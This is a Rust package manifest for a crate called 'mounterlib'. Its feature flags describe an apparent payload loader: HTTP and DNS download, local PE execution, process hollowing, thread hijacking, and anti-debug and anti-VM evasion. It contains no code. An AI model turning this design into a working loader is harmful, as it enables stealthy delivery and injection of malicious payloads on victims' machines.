[package]
name = "mounterlib"
version = "0.1.0"
edition.workspace = true
license.workspace = true
authors.workspace = true

[dependencies]
mainlib = { path = "../mainlib" }
anyhow = "1.0"
sha2 = "0.10"
reqwest = { version = "0.11", features = ["blocking"], optional = true }
windows = { version = "0.52", features = [
    "Win32_Foundation",
    "Win32_System_Memory",
    "Win32_System_Threading",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_Diagnostics_ToolHelp",
    "Win32_System_SystemServices",
    "Win32_Security",
    "Win32_System_Kernel",
    "Win32_System_WindowsProgramming",
    "Win32_System_LibraryLoader",
    "Win32_System_SystemInformation",
] }

[features]
default = ["download-http", "execution-local-pe"]

# Download methods
download-http = ["reqwest"]
download-dns = []

# Execution methods
execution-local-pe = []
execution-process-hollowing = []
execution-thread-hijack = []

# Security features
anti-debug = []
anti-vm = []

# Utilities
encryption = []
compression = []
